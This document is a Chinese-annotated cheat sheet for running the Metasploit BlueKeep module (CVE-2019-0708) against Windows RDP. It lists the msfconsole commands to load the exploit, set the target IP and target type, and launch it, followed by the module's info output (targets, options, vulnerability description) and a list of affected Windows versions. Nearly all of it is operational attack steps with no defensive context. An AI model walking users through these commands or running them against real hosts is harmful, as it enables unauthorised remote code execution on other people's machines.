msfconsole ##进入metasploit框架 reload_all ##重新载入漏洞模块 search 0708 ##搜索0708的漏洞 use exploit/windows/rdp/cve_2019_0708_bluekeep _rce ##0708RDP攻击模块 info ##查看漏洞的相关信息 show options ##查看需要设置的参数 set rhosts ##靶机ip ##设置需要攻击的靶机ip地址 show targets ##显示可以攻击的靶机类型 set target 数字 ##设置攻击的靶机类型 exploit ##开始利用
Name: CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free Module: exploit/windows/rdp/cve_2019_0708_bluekeep_rce Platform: Windows Arch: Privileged: Yes License: Metasploit Framework License (BSD) Rank: Manual Disclosed: 2019-05-14
Provided by: Sean Dillon <sean.dillon@risksense.com> Ryan Hanson <dunno@findthisout.com> OJ Reeves <oj@beyondbinary.io> Brent Cook <bcook@rapid7.com>
Available targets: Id Name -- ---- 0 Automatic targeting via fingerprinting 1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64) 2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox) 3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare) 4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
Check supported: Yes
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random RDP_DOMAIN no The client domain name to report during connect RDP_USER no The username to report during connect, UNSET = random RHOSTS yes The target address range or CIDR identifier RPORT 3389 yes The target port (TCP)
Payload information: Space: 952
Description: The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution.
Windows XP for 32-bit Systems Service Pack 3 Windows 7 for 32-bit Systems Windows 7 for x64-based Systems Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2003 for 32-bit Systems Service Pack 2 Windows Server 2003 R2 for 32-bit Systems Service Pack2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation) Windows Server 2008 for x64-based Systems Service Pack2 Windows Server 2008 for x64-based Systems Service Pack2 (Server Core installation) Windows Server 2008 R2 for x64-based Systems ServicePack 1 Windows Server 2008 R2 for x64-based Systems ServicePack 1 (Server Core installation) 暂不支持的系统: Windows Server 2003 for x64-based Systems Service Pack2 Windows Server 2008 for Itanium-Based Systems ServicePack 2 Windows Server 2008 R2 for Itanium-Based SystemsService Pack 1